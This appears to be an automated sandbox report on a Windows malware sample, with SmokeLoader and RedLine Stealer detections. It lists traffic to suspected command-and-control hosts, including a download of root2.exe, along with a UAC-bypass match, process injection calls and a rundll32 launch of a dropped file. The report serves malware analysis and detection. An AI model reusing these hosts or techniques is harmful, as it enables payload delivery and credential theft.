            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: unknownDNS traffic detected: queries for: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: B87E.exe, 00000005.00000002.464864822.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,5_2_004C3A08

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F0250_2_0040F025
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004170DC0_2_004170DC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138E80_2_004138E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E2C0_2_00413E2C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C6350_2_0040C635
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143700_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040F0254_2_0040F025
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004170DC4_2_004170DC
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004138E84_2_004138E8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00413E2C4_2_00413E2C
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040C6354_2_0040C635
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004143704_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004157C94_2_004157C9
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F75ED5_2_004F75ED
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BC1BB5_2_004BC1BB
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F12205_2_004F1220
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004A76415_2_004A7641
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_005067605_2_00506760
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B37845_2_004B3784
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F081F5_2_004F081F
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004D6A7B5_2_004D6A7B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0049BC945_2_0049BC94
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004013D8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401407 NtAllocateVirtualMemory,0_2_00401407
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DD
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013E3 NtAllocateVirtualMemory,0_2_004013E3
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013F6 NtAllocateVirtualMemory,0_2_004013F6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013FE NtAllocateVirtualMemory,0_2_004013FE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014A8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B3
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014BF
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013D8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00401407 NtAllocateVirtualMemory,4_2_00401407
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DA
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DD
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013E3 NtAllocateVirtualMemory,4_2_004013E3
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013F6 NtAllocateVirtualMemory,4_2_004013F6
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013FE NtAllocateVirtualMemory,4_2_004013FE
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014A8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B3
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014BF
            Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: B87E.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: EBC4.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: gfgsrbs.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp 3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gfgsrbs C:\Users\user\AppData\Roaming\gfgsrbs
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe "C:\Users\user\AppData\Local\Temp\EBC4.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",WorhdhqfpryrJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B87E.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@9/5@35/10
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B8E86 CreateToolhelp32Snapshot,5_2_004B8E86
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
